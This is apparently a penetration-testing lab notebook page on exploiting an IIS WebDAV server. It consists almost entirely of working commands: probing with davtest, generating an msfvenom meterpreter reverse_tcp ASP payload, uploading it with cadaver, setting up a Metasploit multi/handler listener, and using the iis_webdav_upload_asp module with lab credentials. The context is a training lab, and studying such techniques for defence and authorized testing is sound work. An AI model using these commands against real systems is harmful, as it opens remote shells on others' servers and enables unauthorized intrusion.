msfvenom,metasploit

First use the davtest command to check which format of files does the server support

davtest -auth username:password -url http://ip address/webdav

Msfvenom

In this case the server supports .asp files also so generate a payload using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(your ip) LPORT=1234 -f asp > shell.asp

Use cadaver to upload the generated shell.asp payload to the /webdav directory

cadaver http://10.4.18.218/webdav

put /root/shell.asp

Before executing the shell.asp, setup a listener/handler that will receive the reverse connection from the target and send the stage that provides with a meterpreter session when executed.

Open a new terminal tab and run Metasploit with database support

service postgresql start && msfconsole

Setup a Metasploit handler, using the same payload, LHOST, LPORT provided to msfvenom

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.80.4
set LPORT 1234
run

Open the http://10.4.18.218/webdav link in the browser and click on shell.asp file
The Meterpreter session will be opened

Use cadaver to delete the shell.asp uploaded file

cadaver http://10.4.18.218/webdav
delete shell.asp

Metasploit - automatic

Use Metasploit iis_webdav_upload_asp module to get a meterpreter session on the target system.

service postgresql start && msfconsole

search iis upload
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.4.22.96	# Lab reset = IP changed
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit.asp
exploit

you will be provided with a meterpreter session

PreviousIIS WebDav NextSMB

Last updated 1 year ago